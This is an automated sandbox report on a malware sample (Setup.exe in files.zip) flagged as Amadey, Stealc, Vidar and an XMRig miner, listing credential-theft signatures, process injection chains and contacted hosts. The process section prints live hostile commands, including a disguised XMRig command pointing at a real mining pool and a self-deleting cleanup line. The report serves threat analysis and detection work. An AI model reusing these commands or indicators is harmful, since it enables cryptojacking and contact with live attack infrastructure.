Malware Analysis Report

2024-09-11 16:08

Sample ID 240617-v887gsxfqd
Target files.zip
SHA256 6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c
Tags
amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c

Threat Level: Known bad

The file files.zip was found to be: Known bad.

Malicious Activity Summary

amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx

xmrig

Amadey

Detect Vidar Stealer

Stealc

Vidar

XMRig Miner payload

Blocklisted process makes network request

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Reads user/profile data of local email clients

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Downloads MZ/PE file

Suspicious use of SetThreadContext

Checks computer location settings

Executes dropped EXE

Drops file in Windows directory

Checks installed software on the system

Loads dropped DLL

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies system certificate store

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Checks processor information in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-17 17:40

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-17 17:40

Reported

2024-06-17 17:43

Platform

win10v2004-20240508-en

Max time kernel

114s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1412 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AKECBFBAEB.exe
PID 1412 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AKECBFBAEB.exe
PID 1412 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AKECBFBAEB.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 1412 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AEHIDAKECF.exe
PID 1412 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AEHIDAKECF.exe
PID 1412 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AEHIDAKECF.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 1412 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 1412 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 1412 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 4608 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1304 wrote to memory of 892 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1304 wrote to memory of 892 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1304 wrote to memory of 892 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4376,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3080,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:3

C:\ProgramData\AKECBFBAEB.exe

"C:\ProgramData\AKECBFBAEB.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\ProgramData\AEHIDAKECF.exe

"C:\ProgramData\AEHIDAKECF.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKKFIIEBKEGI" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Files

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-17 17:40

Reported

2024-06-17 17:43

Platform

win11-20240611-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\BAKKEGCAAE.exe N/A
N/A N/A C:\ProgramData\BKKJKFBKKE.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 704 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BAKKEGCAAE.exe
PID 704 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BAKKEGCAAE.exe
PID 704 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BAKKEGCAAE.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 704 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BKKJKFBKKE.exe
PID 704 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BKKJKFBKKE.exe
PID 704 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BKKJKFBKKE.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 704 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 704 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 704 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 2164 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2164 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2164 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 3616 wrote to memory of 3172 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 3172 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 3172 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\ProgramData\BAKKEGCAAE.exe

"C:\ProgramData\BAKKEGCAAE.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\ProgramData\BKKJKFBKKE.exe

"C:\ProgramData\BKKJKFBKKE.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKFIJDHJEGI" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 poocoin.online udp
NL 149.154.167.99:443 t.me tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 18.53.55.162.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 104.21.16.123:443 businessdownloads.ltd tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 199.232.196.193:443 i.imgur.com tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
